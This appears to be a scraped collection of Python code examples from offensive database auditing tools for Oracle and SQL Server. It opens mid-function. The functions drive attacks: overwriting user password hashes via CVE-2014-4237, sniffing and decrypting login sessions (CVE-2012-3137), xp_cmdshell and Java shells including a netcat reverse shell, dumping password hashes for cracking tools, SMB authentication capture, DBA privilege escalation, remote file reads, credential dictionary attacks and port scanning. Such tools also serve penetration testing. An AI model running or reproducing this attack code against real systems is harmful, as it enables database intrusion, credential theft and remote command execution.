		REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
		REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
		args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(args['set-pwd-2014-4237'][0],hash10g, hash11g))
		status = cve.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
		if status == True:
			cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(args['set-pwd-2014-4237'][0],args['set-pwd-2014-4237'][1]))
		elif status == False:
			cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(args['set-pwd-2014-4237'][0]))
		elif status == None:
			cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(args['set-pwd-2014-4237'][0]))
Example #45
0
def runCVE20123137Module(args):
	'''
	Run the CVE_2012_3137 module
	'''
	if checkOptionsGivenByTheUser(args,["test-module","get-all-passwords","decrypt-sessions"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
	cve = CVE_2012_3137 (args,  accountsFile=args['user-list'], timeSleep=args['timeSleep'])
	if args['test-module'] == True :
		cve.testAll()
	#Option 1: get all passwords
	if args['get-all-passwords'] != None:
		print 
		if geteuid() != 0:
			args['print'].badNews("Sorry, you need to run this as root because I need to sniff authentications to the database")
		else:
			args['print'].title("Getting remote passwords on the {0} server, port {1}".format(args['server'],args['port']))
			cve.getPasswords()
			keys = cve.getKeys()
			if keys != []:
				args['print'].goodNews("Here are keys:\n\n{0}\n\nIf for some users keys are empty, there was an error during capture or this Oracle user does not exist on the database".format('\n'.join(keys)))
				filename = "sessions-{0}-{1}-{2}{3}".format(args['server'],args['port'],args['sid'],CHALLENGE_EXT_FILE)
				f = open(filename,"w")
				f.write('\n'.join(keys))
				f.close()
				args['print'].goodNews("Sessions strored in the {0} file.".format(filename))
			else : 
				args['print'].badNews("Impossible to exploit this vulnreability")
	#Option 2: decrypt sessions
	if args['decrypt-sessions'] != None:
		args['print'].title("Decrypt sessions stored in {0} via {1}".format(args['decrypt-sessions'][0],args['decrypt-sessions'][1]))
		passwds = cve.decryptKeys(args['decrypt-sessions'][0], args['decrypt-sessions'][1])
		if passwds != []:
			passwordsStr = ""
			for e in passwds : 
				passwordsStr +='{0}:{1}\n'.format(e[0],e[1])
			args['print'].goodNews("Accounts found:\n{0}".format(passwordsStr))
		else:
			args['print'].badNews("No password has been found")
Example #46
0
def runXpCmdShellModule(args):
    '''
	Run the XpCmdShell module
	'''
    noErrorWithEnableXpcmdshell = True
    if checkOptionsGivenByTheUser(
            args,
        ["test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell"],
            checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    xpcmdshell = Xpcmdshell(args)
    xpcmdshell.connect()
    if args["test-module"] == True: xpcmdshell.testAll()
    if args["enable-xpcmdshell"] == True:
        args['print'].title("Re-enable Xpcmdshell")
        noErrorWithEnableXpcmdshell = xpcmdshell.enableXpcmdshell()
        if noErrorWithEnableXpcmdshell == True:
            args['print'].goodNews("Xpcmdshell is re-enabled")
        else:
            args['print'].badNews("Xpcmdshell is NOT re-enabled")
    if args["shell"] == True:
        args['print'].title("Trying to get a shell thanks to xpcmdshell")
        status = xpcmdshell.getInteractiveShell()
        if status == True:
            args['print'].goodNews("Good Bye :)")
        else:
            args['print'].badNews("Impossible to get a shell on the database")
    if args["disable-xpcmdshell"] == True:
        if noErrorWithEnableXpcmdshell == True:
            args['print'].title("Disable Xpcmdshell")
            status = xpcmdshell.disableXpcmdshell()
            if status == True: args['print'].goodNews("Xpcmdshell is disabled")
            else:
                args['print'].badNews(
                    "Xpcmdshell is NOT disabled: {0}".format(status))
    xpcmdshell.closeConnection()
Example #47
0
File: Java.py Project: 6zq/odat
def runjavaModule(args):
	'''
	Run the JAVA module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","shell","reverse-shell"]) == False : return EXIT_MISS_ARGUMENT
	java = Java(args)
	status = java.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the DBMSScheduler library can be used")
		status = java.testAll()
	#Option 1: exec
	if args['exec'] != None:
		args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server']))
		status = java.execOSCommand(cmd=args['exec'],printResponse=True, needCreateClassAndFunction = True, needDeleteClassAndFunction = True)
	#Option 2: shell
	if args['shell'] == True:
		args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
		java.getInteractiveShell()
	#Option 3: reverse shell
	if args['reverse-shell'] != None :
		args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
		java.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1])
	java.close()
Example #48
0
def runPasswordsModule(args):
    '''
	Run the Passwords module
	'''
    status = True
    if checkOptionsGivenByTheUser(args, [
            "test-module", "get-passwords", "get-passwords-from-history",
            "get-passwords-not-locked"
    ]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    status = passwords.connection(stopIfError=True)
    passwords.__getLockedUsernames__()
    if args.has_key('info') == False:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        status = passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        if status == True:
            args['print'].goodNews(
                "Here are Oracle hashed passwords (some accounts can be locked):"
            )
            passwords.printPasswords()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):"
            )
            passwords.printPasswordsOclHashcat()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):"
            )
            passwords.printPasswordsJohn()
        else:
            args['print'].badNews(
                "Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-not-locked'] == True:
        args['print'].title(
            "Try to get Oracle hashed passwords when the account is not locked"
        )
        blacklistOfUsernames = passwords.__getLockedUsernames__()
        status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames)
        if status == True:
            args['print'].goodNews(
                "Here are Oracle hashed passwords (all accounts are opened, not locked):"
            )
            passwords.printPasswords()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):"
            )
            passwords.printPasswordsOclHashcat()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for John the Ripper (all accounts are opened, not locked):"
            )
            passwords.printPasswordsJohn()
        else:
            args['print'].badNews(
                "Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews(
                "Impossible to get hashed passwords from history: {0}".format(
                    status))
Example #49
0
def runSMBAuthenticationCaptureModule(args):
    '''
	Run the SMBAuthenticationCapture module
	'''
    if checkOptionsGivenByTheUser(args, [
            "capture", "xp-dirtree-capture", "xp-fileexist-capture",
            "xp-getfiledetails-capture"
    ],
                                  checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    if args["capture"] != None:
        smbAuthenticationCapture = SMBAuthenticationCapture(
            args, args['capture'][0], args['share-name'][0])
    elif args["xp-dirtree-capture"] != None:
        smbAuthenticationCapture = SMBAuthenticationCapture(
            args, args["xp-dirtree-capture"][0], args['share-name'][0])
    elif args["xp-fileexist-capture"] != None:
        smbAuthenticationCapture = SMBAuthenticationCapture(
            args, args["xp-fileexist-capture"][0], args['share-name'][0])
    elif args["xp-getfiledetails-capture"] != None:
        smbAuthenticationCapture = SMBAuthenticationCapture(
            args, args["xp-getfiledetails-capture"][0], args['share-name'][0])
    else:
        smbAuthenticationCapture = SMBAuthenticationCapture(
            args, "127.0.0.1", args['share-name'][0])
    smbAuthenticationCapture.connect()
    if args["test-module"] == True: smbAuthenticationCapture.testAll()
    if args["capture"] != None:
        args['print'].title(
            "Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method"
        )
        status = smbAuthenticationCapture.tryToCaptureASmbAuthentication()
        if status == True:
            args['print'].unknownNews(
                "You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !"
            )
        else:
            args['print'].badNews(
                "You can't capture a SMB authentication with these methods")
    elif args["xp-dirtree-capture"] != None:
        args['print'].title(
            "Try to capture a SMB authentication with the xp_dirtree method only"
        )
        status = smbAuthenticationCapture.captureSMBAuthenticationViaXpDirtree(
        )
        if status == True:
            args['print'].unknownNews(
                "You can perhaps capture a SMB authentication with the xp_dirtree method. Check your SMB capture tool !"
            )
        else:
            args['print'].badNews(
                "You can't capture a SMB authentication with the xp_dirtree method"
            )
    elif args["xp-fileexist-capture"] != None:
        args['print'].title(
            "Try to capture a SMB authentication with the xp_fileexist method only"
        )
        status = smbAuthenticationCapture.captureSMBAuthenticationViaXpFileexist(
        )
        if status == True:
            args['print'].unknownNews(
                "You can perhaps capture a SMB authentication with the xp_fileexist method. Check your SMB capture tool !"
            )
        else:
            args['print'].badNews(
                "You can't capture a SMB authentication with the xp_fileexist method"
            )
    elif args["xp-getfiledetails-capture"] != None:
        args['print'].title(
            "Try to capture a SMB authentication with the xp_getfiledetails method only"
        )
        status = smbAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails(
        )
        if status == True:
            args['print'].unknownNews(
                "You can perhaps capture a SMB authentication with the xp_getfiledetails method. Check your SMB capture tool !"
            )
        else:
            args['print'].badNews(
                "You can't capture a SMB authentication with the xp_getfiledetails method"
            )
    smbAuthenticationCapture.closeConnection()
Example #50
0
def runPrivilegeEscalationModule(args):
	'''
	Run the Passwords module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module",
										"revoke-dba-role",
										"dba-with-execute-any-procedure",
										"alter-pwd-with-create-any-procedure",
										"dba-with-create-any-trigger",
										"dba-with-analyze-any",
										"dba-with-create-any-index",
										"exec-with-analyze-any",
										"exec-with-create-any-index",
										"exec-with-create-any-trigger",
										"exec-with-create-any-procedure",
										"exec-with-execute-any-procedure",
										"get-privs",
										"get-detailed-privs"]) == False : return EXIT_MISS_ARGUMENT
	privilegeEscalation = PrivilegeEscalation(args)
	status = privilegeEscalation.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the current user can gain elevated access (privilege escalation)")
		status = privilegeEscalation.testAll()
	if args['get-privs'] == True :
		args['print'].title("Get system privileges and roles of current Oracle user")
		status = privilegeEscalation.printPrivilegesAndRoles()
	if args['get-detailed-privs'] == True:
		args['print'].title("Get system privileges and roles of current Oracle user + roles and privileges of roles granted to this current user")
		status = privilegeEscalation.printPrivilegesAndRoles(deep=True)
	if args['revoke-dba-role'] == True :
		args['print'].title("Revoke DBA role from current user ({0})".format(privilegeEscalation.args['user']))
		status = privilegeEscalation.revokeDbaRole()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to revoke DBA role from {0}: {1}".format(privilegeEscalation.args['user'], status))
		else : 
			args['print'].goodNews("The DBA role has been revoked from {0}".format(privilegeEscalation.args['user']))
	if args['dba-with-execute-any-procedure'] == True:
		args['print'].title("Grant DBA role to current user with CREATE/EXECUTE ANY PROCEDURE method")
		status = privilegeEscalation.giveDbaRoleWithExecuteAnyProcedureMethod()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status))
		elif status==None:
			args['print'].unknownNews("The current user has already DBA role")	
		elif status==True: 
			args['print'].goodNews("The DBA role has been granted to this current user")
	if args['alter-pwd-with-create-any-procedure'] != None :
		user, newpwd = privilegeEscalation.args['alter-pwd-with-create-any-procedure'][0], privilegeEscalation.args['alter-pwd-with-create-any-procedure'][1]
		args['print'].title("Alter the password of {0} by '{1}' with CREATE ANY PROCEDURE method".format(user, newpwd))
		status = privilegeEscalation.setPasswordWithCreateAnyProcedureMethod(user, newpwd)
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to alter the password of {0}: {1}".format(user, status))
		elif status==True:
			args['print'].goodNews("Password of {0} user modified: The new password of {0} is '{1}'".format(user, newpwd))
	if args['dba-with-create-any-trigger'] == True:
		args['print'].title("Grant DBA role to current user with CREATE ANY TRIGGER method")
		status = privilegeEscalation.giveDbaRoleWithCreateAnyTriggerMethod()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status))
		elif status==None:
			args['print'].unknownNews("The current user has already DBA role")	
		elif status==True: 
			args['print'].goodNews("The DBA role has been granted to this current user")
	if args['dba-with-analyze-any'] == True:
		args['print'].title("Grant DBA role to current user with ANALYZE ANY method")
		status = privilegeEscalation.giveDbaRoleWithAnalyzeAnyMethod()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status))
		elif status==None:
			args['print'].unknownNews("The current user has already DBA role")	
		elif status==True: 
			args['print'].goodNews("The DBA role has been granted to this current user")
		else:
			args['print'].badNews("The DBA role has NOT been granted to this current user")
	if args['dba-with-create-any-index'] == True:
		args['print'].title("Grant DBA role to current user with CREATE ANY INDEX method")
		status = privilegeEscalation.giveDbaRoleWithCreateAnyIndexMethod()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status))
		elif status==None:
			args['print'].unknownNews("The current user has already DBA role")	
		elif status==True: 
			args['print'].goodNews("The DBA role has been granted to this current user")
		else:
			args['print'].badNews("The DBA role has NOT been granted to this current user")
	#Semi manual exploitation
	if args['exec-with-execute-any-procedure'] != None:
		args['print'].title("Execute the request as SYSTEM with CREATE/EXECUTE ANY PROCEDURE method")
		status = privilegeEscalation.executeRequestWithExecuteAnyProcedureMethod(privRequest=args['exec-with-execute-any-procedure'][0])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status))
		elif status==True: 
			args['print'].goodNews("The request has been executed successfully as system")
	if args['exec-with-create-any-procedure'] != None:
		args['print'].title("Execute the request as SYSTEM with CREATE ANY PROCEDURE method only")
		status = privilegeEscalation.executeSytemRequestWithCreateAnyProcedureMethod(privRequest=args['exec-with-create-any-procedure'][0])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status))
		elif status==True: 
			args['print'].goodNews("The request has been executed successfully as system")
	if args['exec-with-create-any-trigger'] != None:
		args['print'].title("Execute the request as SYSTEM with CREATE ANY TRIGGER method")
		status = privilegeEscalation.executeSytemRequestWithCreateAnyTriggerMethod(privRequest=args['exec-with-create-any-trigger'][0])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status))
		elif status==True: 
			args['print'].goodNews("The request has been executed successfully as system")
	if args['exec-with-analyze-any'] != None:
		args['print'].title("Execute the request as SYSTEM with ANALYZE ANY method")
		status = privilegeEscalation.executeSytemRequestWithAnalyzeAnyMethod(privRequest=args['exec-with-analyze-any'][0])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status))
		elif status==True: 
			args['print'].goodNews("The request has been executed successfully as system")
	if args['exec-with-create-any-index'] != None:
		args['print'].title("Execute the request as SYSTEM with CREATE ANY INDEX method")
		status = privilegeEscalation.executeSytemRequestWithCreateAnyIndexMethod(privRequest=args['exec-with-create-any-index'][0])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status))
		elif status==True: 
			args['print'].goodNews("The request has been executed successfully as system")
Example #51
0
def runBulkOpenModule(args):
	'''
	Run the BulkOpen module
	'''
	
	def runBulkInsertForRead(args,bulkOpen):
		'''
		Run the Bulk Insert method to read a file
		'''
		args['print'].title("Try to read the remote file {0} thanks to the Bulk Insert method".format(args["read-file"][0]))
		data = bulkOpen.readFileViaBulkinsert(args["read-file"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to read the remote file {0} with Bulk Insert: {1}".format(args["read-file"][0],data))
			return data
		else:
			args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(args["read-file"][0], data.encode('utf-8')))
			return True
			
	def runOpenRowSetForRead(args,bulkOpen):
		'''
		Run the Openrowset method to read a file
		'''
		args['print'].title("Try to read the remote file {0} thanks to the Openrowset method".format(args["read-file"][0]))
		data = bulkOpen.readFileViaOpenRowSet(args["read-file"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to read the remote file {0} with Openrowset: {1}".format(args["read-file"][0],data))
			return data
		else:
			args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(args["read-file"][0], data.encode('utf-8')))
			return True
			
	def runBulkInsertForGet(args, bulkOpen):
		'''
		Run the Bulk Insert method to get a remote file
		'''
		args['print'].title("Try to get the remote file {0} thanks to the Bulk Insert method".format(args["get-file"][0]))
		status = bulkOpen.getFileViaBulkinsert(args["get-file"][0],args["get-file"][1])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to get the remote file {0} with Bulk Insert: {1}".format(args["get-file"][0],status))
			return status
		else:
			args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(args["get-file"][0], args["get-file"][1]))
			return True
		
	def runOpenRowSetForGet(args, bulkOpen):
		'''
		Run the Openrowset method to get a file
		'''
		args['print'].title("Try to get the remote file {0} thanks to the Openrowset method".format(args["get-file"][0]))
		status = bulkOpen.getFileViaOpenRowSet(args["get-file"][0],args["get-file"][1])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to get the remote file {0} with Openrowset: {1}".format(args["get-file"][0],status))
			return status
		else:
			args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(args["get-file"][0], args["get-file"][1]))
			return True
			
	if checkOptionsGivenByTheUser(args,["read-file","get-file","enable-ad-hoc-distributed-queries","disable-ad-hoc-distributed-queries","search-credentials","scan-ports","request-rdb"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	bulkOpen = BulkOpen(args)
	bulkOpen.connect()
	if args["test-module"] ==True: 
		bulkOpen.testAll()
	#enable-ad-hoc-distributed-queries
	if args["enable-ad-hoc-distributed-queries"] ==True:
		args['print'].title("Try to enable ad hoc distributed queries")
		status = bulkOpen.enableAdHocDistributedQueries()
		if status == True:
			args['print'].goodNews("Ad hoc distributed queries has been enabled")
		else:
			args['print'].badNews("Impossible to enable ad hoc distributed queries: {1}".format(status))
	#read-file option
	if args["read-file"] != None:
		if args["method"] != None:
			if args["method"]==BULKOPEN_METHOD_IN_BULKOPEN:
				runBulkInsertForRead(args,bulkOpen)
			elif args["method"]==OPENROWSET_METHOD_IN_BULKOPEN:
				runOpenRowSetForRead(args,bulkOpen)
		else:
			data = runBulkInsertForRead(args,bulkOpen)
			if isinstance(data,Exception):
				runOpenRowSetForRead(args,bulkOpen)
	#get-file option
	if args["get-file"] != None:
		if args["method"] != None:
			if args["method"]==BULKOPEN_METHOD_IN_BULKOPEN:
				runBulkInsertForGet(args,bulkOpen)
			elif args["method"]==OPENROWSET_METHOD_IN_BULKOPEN:
				runOpenRowSetForGet(args,bulkOpen)
		else:
			data = runBulkInsertForGet(args,bulkOpen)
			if isinstance(data,Exception):
				runOpenRowSetForGet(args,bulkOpen)
	#dictionary attack on a remote database
	if args["search-credentials"] != None :
		args['print'].title("Dictionnary attack on the database {0}:{1}/{2} with the credentials file {3}".format(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2],args['accounts-file']))
		accounts = bulkOpen.searchValideAccounts(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2], sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file'])
		if isinstance(accounts,Exception):
			status = bulkOpen.enableAdHocDistributedQueries()
			if status == True:
				accounts = bulkOpen.searchValideAccounts(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2], sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file'])
				if isinstance(accounts,Exception):
					args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts,status))
				else :
					args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2],accounts))
					bulkOpen.disableAdHocDistributedQueries()
			else :
				args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts,status))
		else: 
			args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2],accounts))
	#request a remote database from the target
	if args["request-rdb"] != None :
		args['print'].title("Try to send the request '{0}' to {1}:{2}@{3}:{4}/{5}".format(args["request-rdb"][5], args["request-rdb"][3], args["request-rdb"][4], args["request-rdb"][0], args["request-rdb"][1],args["request-rdb"][2]))
		results = bulkOpen.remoteConnectionWithOpenrowset (ip=args["request-rdb"][0], port=args["request-rdb"][1], login=args["request-rdb"][3], password=args["request-rdb"][4], database=args["request-rdb"][2], sqlRequest=args["request-rdb"][5])
		if isinstance(results ,Exception):
			args['print'].badNews("Impossible to request the remote database: {0}".format(results))
		else: 
			table = ""
			for l in results:
				table += ' | '.join(map(str,l))+'\n'
			args['print'].goodNews("Results:\n{0}".format(table))
	#Scan ports with openrowset
	if args['scan-ports'] != None:
		args['print'].title("Scanning ports of {0} through {1}".format(args['scan-ports'][0],args['host']))
		results = bulkOpen.scanPortsWithOpenrowset(ip=args['scan-ports'][0], ports=args['scan-ports'][1], nbThread=SCAN_PORT_NUMBER_THREAD)
		if isinstance(results ,Exception):
			args['print'].badNews("Impossible to scan ports: {0}".format(results))
	#disable-ad-hoc-distributed-queries
	if args["disable-ad-hoc-distributed-queries"] == True:
		args['print'].title("Try to disable ad hoc distributed queries")
		status = bulkOpen.disableAdHocDistributedQueries()
		if status == True:
			args['print'].goodNews("Ad hoc distributed queries has been disabled")
		else:
			args['print'].badNews("Impossible to disable ad hoc distributed queries: {0}".format(status))
	bulkOpen.closeConnection()